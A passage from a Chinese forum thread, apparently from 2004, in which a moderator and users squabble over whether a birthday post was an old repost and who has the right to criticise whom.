论坛用户

引用:
睁大你的眼睛看看这个是什么时候的帖子，我发的时候还没有人发呢？

就你2003。10月注册的，登陆23次也有资格批评我，我就在这里浪费空间，也不用你来批评我。空间谁没有，就你有啊，俺有250M的呢。我最讨厌别人说我了，真有意见就去申请投诉，投诉我

注册的时间比你晚，不能代表不如你啊。年轻人要虚心啊

B16层发表时间: 04-05-03 04:41

回复: abctm [abctm]

版主

不是这个意思，意思是那个时候我发它根本没有看见，以后有人发它有看见了，说我发的老。
――――――
很经典的...的老帖子！
老大你生日
都多大的人了？
有点创新心不？
别人都贴了N遍的，你生日还再贴一遍!
20CN的空间够你用不？
不够我那儿有
――――――――
我是最早发的，他还这样说我，你说这不是找事么？再说我过生日和他又没有关系，我多大关他什么事情啊。他说这话事没有道理的

B17层发表时间: 04-05-03 08:46

回复: t [doscience]

论坛用户

引用:
--------------------------------------------------------------------------------
睁大你的眼睛看看这个是什么时候的帖子，我发的时候还没有人发呢？

就你2003。10月注册的，登陆23次也有资格批评我，我就在这里浪费空间，也不用你来批评我。空间谁没有，就你有啊，俺有250M的呢。我最讨厌别人说我了，真有意见就去申请投诉，投诉我

--------------------------------------------------------------------------------

B18层发表时间: 04-05-03 10:35